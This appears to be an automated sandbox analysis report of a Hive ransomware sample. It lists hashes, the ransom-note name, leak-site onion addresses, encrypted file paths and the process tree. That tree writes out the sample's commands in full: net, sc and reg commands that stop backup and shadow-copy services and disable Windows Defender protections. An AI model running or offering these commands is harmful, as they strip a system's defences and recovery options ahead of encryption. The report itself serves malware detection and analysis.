Analysis
-
max time kernel
130s -
max time network
130s -
platform
windows7_x64 -
resource
win7-en-20211104 -
submitted
24-11-2021 14:30
Static task
static1
Behavioral task
behavioral1
Sample
serenb.exe
Resource
win7-en-20211104
General
-
Target
serenb.exe
-
Size
3.4MB
-
MD5
177417be748814f6168171a42545f9dd
-
SHA1
9c8b988e66e0fe6f9dab69b1055e4ee200531094
-
SHA256
47dbb2594cd5eb7015ef08b7fb803cd5adc1a1fbe4849dc847c0940f1ccace35
-
SHA512
c90eebbd4663ffe4bec089e21e4f7c1a1441e21a2f78cc190b9ce85fd048bf46901aa74273695df7b6434887284a26d4fdaaf657cb5d9c5469574158adc351c2
Malware Config
Extracted
C:\Djfk_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid Process 1628 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid Process 484 bcdedit.exe 2000 bcdedit.exe -
Modifies extensions of user files 12 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
serenb.exedescription ioc Process File opened for modification C:\Users\Admin\Pictures\MountRemove.crw.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_s4rpsVsGBco0.snwkz serenb.exe File opened for modification C:\Users\Admin\Pictures\RemoveWrite.tiff.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_Xr_RUA2buRE0.snwkz serenb.exe File renamed C:\Users\Admin\Pictures\SearchTrace.raw => C:\Users\Admin\Pictures\SearchTrace.raw.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_a6Z4lN5ROkM0.snwkz serenb.exe File renamed C:\Users\Admin\Pictures\SendConvertTo.tif => C:\Users\Admin\Pictures\SendConvertTo.tif.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_tJi30oeqF840.snwkz serenb.exe File opened for modification C:\Users\Admin\Pictures\SearchTrace.raw.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_a6Z4lN5ROkM0.snwkz serenb.exe File opened for modification C:\Users\Admin\Pictures\SendConvertTo.tif.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_tJi30oeqF840.snwkz serenb.exe File renamed C:\Users\Admin\Pictures\MeasureLock.crw => C:\Users\Admin\Pictures\MeasureLock.crw.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_fqNkIZYl1VM0.snwkz serenb.exe File opened for modification C:\Users\Admin\Pictures\MeasureLock.crw.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_fqNkIZYl1VM0.snwkz serenb.exe File renamed C:\Users\Admin\Pictures\MountRemove.crw => C:\Users\Admin\Pictures\MountRemove.crw.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_s4rpsVsGBco0.snwkz serenb.exe File renamed C:\Users\Admin\Pictures\RegisterSkip.png => C:\Users\Admin\Pictures\RegisterSkip.png.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_PWE7NiDdd600.snwkz serenb.exe File opened for modification C:\Users\Admin\Pictures\RegisterSkip.png.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_PWE7NiDdd600.snwkz serenb.exe File renamed C:\Users\Admin\Pictures\RemoveWrite.tiff => C:\Users\Admin\Pictures\RemoveWrite.tiff.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_Xr_RUA2buRE0.snwkz serenb.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
serenb.exedescription ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-nodes_ja.jar.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_Eq844zxNs_00.snwkz serenb.exe File opened for modification C:\Program Files\VideoLAN\VLC\AUTHORS.txt.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_5w_v_kJPRbE0.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\FREN\WT61FR.LEX.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_gzvEcRwMC240.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\de-DE\InkObj.dll.mui serenb.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BabyBlue\TAB_OFF.GIF.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_GqFITgMKH8E0.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\GostTitle.XSL.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_sgMgTmZOr6s0.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue\TAB_OFF.GIF.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_jL78eX_DFZM0.snwkz serenb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-7.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_pyDO3fJ52zA0.snwkz serenb.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunmscapi.jar.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_cQGase879EE0.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD08758_.WMF.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_BCfmC8IXqLQ0.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\IN00351_.WMF.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_ZjLUCCxeweI0.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02435_.WMF.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_4aILjUxVPjU0.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\ActiveTabImage.jpg.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_qXgTvVmBXtc0.snwkz serenb.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\TipBand.dll.mui serenb.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Word.en-us\SETUP.XML.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_925xCOl1S1s0.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0090087.WMF.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_Ia5xrXocxHk0.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21495_.GIF.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_FjGuyikSGnk0.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImage.jpg.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_7FjBkovjLhw0.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OCRHC.DAT.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_1VG5oYesov80.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\BORDERS\MSART14.BDR.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_iKPs6hKMKLA0.snwkz serenb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pohnpei.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_bsK98Ez12YY0.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RADIAL\RADIAL.INF.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_IQGEmptg3xc0.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\FREN\MSB1FREN.ITS.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_oLn_TFgrxww0.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198494.WMF.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_aX9LMoxV0OA0.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01627_.WMF.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_Q4Trga2_Xso0.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01213K.JPG.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_Ybohv7Z6I-s0.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0149481.WMF.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_WHr8MHhqdQM0.snwkz serenb.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL\tipresx.dll.mui serenb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\eclipse.inf.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_ENQPRPKjr4Q0.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue.css.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_day5OMRlflU0.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\5.png serenb.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png serenb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring.xml.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_UpX36vnha-M0.snwkz serenb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Curacao.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_7sxKrODzya40.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\RECYCLE.WMF.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_ZHClLfxjcWI0.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00192_.WMF.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_FL1HGRZkoIc0.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Part\List.accdt.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_23mAUsUWGME0.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18257_.WMF.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_AETYw73-vVE0.snwkz serenb.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\mshwLatin.dll.mui serenb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_PH-kXppir2Y0.snwkz serenb.exe File opened for modification C:\Program Files\Microsoft Games\More Games\fr-FR\MoreGames.dll.mui.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_ZezT7SeoFdU0.snwkz serenb.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\pause_down.png serenb.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\EQUATION\eqnedt32.exe.manifest.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z__2GGZSpnFW40.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\AXIS\AXIS.INF.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_Qrs0ya0Yiyc0.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00685_.WMF.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_1jITQUrje1s0.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\ViewHeaderPreview.jpg.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_UkDqoFgWg480.snwkz serenb.exe File created C:\Program Files (x86)\Microsoft Office\Templates\1033\Djfk_HOW_TO_DECRYPT.txt serenb.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02134_.GIF.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_OD4Pk-zQ0Ak0.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18208_.WMF.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_43FxPeTSnhA0.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\ja-JP\js\library.js serenb.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\css\flyout.css serenb.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\css\settings.css serenb.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\keypadbase.xml serenb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santiago.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_uf1RTzrAYI80.snwkz serenb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository_2.3.0.v20131211-1531.jar.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_VYs4nPFPi_c0.snwkz serenb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_Ag0DPeYxHwg0.snwkz serenb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Noronha.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_sBpeJ8sEyUg0.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_OliveGreen.gif.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_M3bExuZfLmQ0.snwkz serenb.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGPICCAP.DPV.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_jDmhiSwJHKI0.snwkz serenb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Reunion.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_ZZNzLdUebOw0.snwkz serenb.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\css\settings.css serenb.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0301252.WMF.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_sCzGWMqmzcg0.snwkz serenb.exe File created C:\Program Files\Microsoft Games\Multiplayer\Spades\fr-FR\Djfk_HOW_TO_DECRYPT.txt serenb.exe File opened for modification C:\Program Files\DVD Maker\directshowtap.ax serenb.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid Process 1060 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exeserenb.exepid Process 988 powershell.exe 2124 powershell.exe 1456 serenb.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid Process Token: SeSecurityPrivilege 1500 wevtutil.exe Token: SeBackupPrivilege 1500 wevtutil.exe Token: SeSecurityPrivilege 1244 wevtutil.exe Token: SeBackupPrivilege 1244 wevtutil.exe Token: SeSecurityPrivilege 852 wevtutil.exe Token: SeBackupPrivilege 852 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1852 wmic.exe Token: SeSecurityPrivilege 1852 wmic.exe Token: SeTakeOwnershipPrivilege 1852 wmic.exe Token: SeLoadDriverPrivilege 1852 wmic.exe Token: SeSystemProfilePrivilege 1852 wmic.exe Token: SeSystemtimePrivilege 1852 wmic.exe Token: SeProfSingleProcessPrivilege 1852 wmic.exe Token: SeIncBasePriorityPrivilege 1852 wmic.exe Token: SeCreatePagefilePrivilege 1852 wmic.exe Token: SeBackupPrivilege 1852 wmic.exe Token: SeRestorePrivilege 1852 wmic.exe Token: SeShutdownPrivilege 1852 wmic.exe Token: SeDebugPrivilege 1852 wmic.exe Token: SeSystemEnvironmentPrivilege 1852 wmic.exe Token: SeRemoteShutdownPrivilege 1852 wmic.exe Token: SeUndockPrivilege 1852 wmic.exe Token: SeManageVolumePrivilege 1852 wmic.exe Token: 33 1852 wmic.exe Token: 34 1852 wmic.exe Token: 35 1852 wmic.exe Token: SeIncreaseQuotaPrivilege 240 wmic.exe Token: SeSecurityPrivilege 240 wmic.exe Token: SeTakeOwnershipPrivilege 240 wmic.exe Token: SeLoadDriverPrivilege 240 wmic.exe Token: SeSystemProfilePrivilege 240 wmic.exe Token: SeSystemtimePrivilege 240 wmic.exe Token: SeProfSingleProcessPrivilege 240 wmic.exe Token: SeIncBasePriorityPrivilege 240 wmic.exe Token: SeCreatePagefilePrivilege 240 wmic.exe Token: SeBackupPrivilege 240 wmic.exe Token: SeRestorePrivilege 240 wmic.exe Token: SeShutdownPrivilege 240 wmic.exe Token: SeDebugPrivilege 240 wmic.exe Token: SeSystemEnvironmentPrivilege 240 wmic.exe Token: SeRemoteShutdownPrivilege 240 wmic.exe Token: SeUndockPrivilege 240 wmic.exe Token: SeManageVolumePrivilege 240 wmic.exe Token: 33 240 wmic.exe Token: 34 240 wmic.exe Token: 35 240 wmic.exe Token: SeIncreaseQuotaPrivilege 240 wmic.exe Token: SeSecurityPrivilege 240 wmic.exe Token: SeTakeOwnershipPrivilege 240 wmic.exe Token: SeLoadDriverPrivilege 240 wmic.exe Token: SeSystemProfilePrivilege 240 wmic.exe Token: SeSystemtimePrivilege 240 wmic.exe Token: SeProfSingleProcessPrivilege 240 wmic.exe Token: SeIncBasePriorityPrivilege 240 wmic.exe Token: SeCreatePagefilePrivilege 240 wmic.exe Token: SeBackupPrivilege 240 wmic.exe Token: SeRestorePrivilege 240 wmic.exe Token: SeShutdownPrivilege 240 wmic.exe Token: SeDebugPrivilege 240 wmic.exe Token: SeSystemEnvironmentPrivilege 240 wmic.exe Token: SeRemoteShutdownPrivilege 240 wmic.exe Token: SeUndockPrivilege 240 wmic.exe Token: SeManageVolumePrivilege 240 wmic.exe Token: 33 240 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
serenb.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid Process procid_target PID 1456 wrote to memory of 620 1456 serenb.exe 28 PID 1456 wrote to memory of 620 1456 serenb.exe 28 PID 1456 wrote to memory of 620 1456 serenb.exe 28 PID 620 wrote to memory of 560 620 net.exe 30 PID 620 wrote to memory of 560 620 net.exe 30 PID 620 wrote to memory of 560 620 net.exe 30 PID 1456 wrote to memory of 1492 1456 serenb.exe 31 PID 1456 wrote to memory of 1492 1456 serenb.exe 31 PID 1456 wrote to memory of 1492 1456 serenb.exe 31 PID 1492 wrote to memory of 924 1492 net.exe 33 PID 1492 wrote to memory of 924 1492 net.exe 33 PID 1492 wrote to memory of 924 1492 net.exe 33 PID 1456 wrote to memory of 676 1456 serenb.exe 34 PID 1456 wrote to memory of 676 1456 serenb.exe 34 PID 1456 wrote to memory of 676 1456 serenb.exe 34 PID 676 wrote to memory of 876 676 net.exe 36 PID 676 wrote to memory of 876 676 net.exe 36 PID 676 wrote to memory of 876 676 net.exe 36 PID 1456 wrote to memory of 280 1456 serenb.exe 37 PID 1456 wrote to memory of 280 1456 serenb.exe 37 PID 1456 wrote to memory of 280 1456 serenb.exe 37 PID 280 wrote to memory of 484 280 net.exe 39 PID 280 wrote to memory of 484 280 net.exe 39 PID 280 wrote to memory of 484 280 net.exe 39 PID 1456 wrote to memory of 1304 1456 serenb.exe 40 PID 1456 wrote to memory of 1304 1456 serenb.exe 40 PID 1456 wrote to memory of 1304 1456 serenb.exe 40 PID 1304 wrote to memory of 1148 1304 net.exe 42 PID 1304 wrote to memory of 1148 1304 net.exe 42 PID 1304 wrote to memory of 1148 1304 net.exe 42 PID 1456 wrote to memory of 1700 1456 serenb.exe 43 PID 1456 wrote to memory of 1700 1456 serenb.exe 43 PID 1456 wrote to memory of 1700 1456 serenb.exe 43 PID 1700 wrote to memory of 1064 1700 net.exe 45 PID 1700 wrote to memory of 1064 1700 net.exe 45 PID 1700 wrote to memory of 1064 1700 net.exe 45 PID 1456 wrote to memory of 1268 1456 serenb.exe 46 PID 1456 wrote to memory of 1268 1456 serenb.exe 46 PID 1456 wrote to memory of 1268 1456 serenb.exe 46 PID 1268 wrote to memory of 1680 1268 net.exe 48 PID 1268 wrote to memory of 1680 1268 net.exe 48 PID 1268 wrote to memory of 1680 1268 net.exe 48 PID 1456 wrote to memory of 992 1456 serenb.exe 49 PID 1456 wrote to memory of 992 1456 serenb.exe 49 PID 1456 wrote to memory of 992 1456 serenb.exe 49 PID 992 wrote to memory of 792 992 net.exe 51 PID 992 wrote to memory of 792 992 net.exe 51 PID 992 wrote to memory of 792 992 net.exe 51 PID 1456 wrote to memory of 956 1456 serenb.exe 52 PID 1456 wrote to memory of 956 1456 serenb.exe 52 PID 1456 wrote to memory of 956 1456 serenb.exe 52 PID 1456 wrote to memory of 1752 1456 serenb.exe 54 PID 1456 wrote to memory of 1752 1456 serenb.exe 54 PID 1456 wrote to memory of 1752 1456 serenb.exe 54 PID 1456 wrote to memory of 1012 1456 serenb.exe 56 PID 1456 wrote to memory of 1012 1456 serenb.exe 56 PID 1456 wrote to memory of 1012 1456 serenb.exe 56 PID 1456 wrote to memory of 2004 1456 serenb.exe 58 PID 1456 wrote to memory of 2004 1456 serenb.exe 58 PID 1456 wrote to memory of 2004 1456 serenb.exe 58 PID 1456 wrote to memory of 1000 1456 serenb.exe 60 PID 1456 wrote to memory of 1000 1456 serenb.exe 60 PID 1456 wrote to memory of 1000 1456 serenb.exe 60 PID 1456 wrote to memory of 880 1456 serenb.exe 62
Processes
-
C:\Users\Admin\AppData\Local\Temp\serenb.exe"C:\Users\Admin\AppData\Local\Temp\serenb.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1456 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:620 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:560
-
-
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:924
-
-
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:876
-
-
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:280 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:484
-
-
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1148
-
-
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1064
-
-
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1268 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1680
-
-
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:992 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:792
-
-
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:956
-
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1752
-
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1012
-
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:2004
-
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1000
-
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:880
-
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:940
-
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1328
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2016
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1496
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1856
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1388
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:432
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:812
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1760
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1064
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1564
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1260
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1952
-
-
